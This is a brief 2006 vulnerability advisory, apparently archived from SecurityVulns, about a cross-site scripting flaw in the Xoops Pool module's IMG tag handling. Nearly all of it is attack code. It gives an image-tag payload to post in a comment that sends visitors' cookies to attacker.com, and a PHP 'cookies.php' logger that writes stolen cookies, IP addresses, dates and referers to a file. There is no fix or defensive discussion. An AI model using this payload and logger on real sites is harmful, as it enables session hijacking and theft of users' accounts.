Xoops Pool Module IMG Tag Cross Site Scripting

2006-01-10T00:00:00
ID SECURITYVULNS:DOC:10946
Type securityvulns
Reporter Securityvulns
Modified 2006-01-10T00:00:00

Description

Night_Warrior<Kurdihs Hacker>

night_warrior771[at]hotmail.com

Xoops Pool Module IMG Tag Cross Site Scripting

Contact :night_warrior771[at]hotmail.com

Post Coment this Code: <img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+document.cookie);"

cookies.php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('steal.php', 'a'); fwrite($fp, ' Cookie: '.$cookie.' IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.' '); fclose($fp); ?>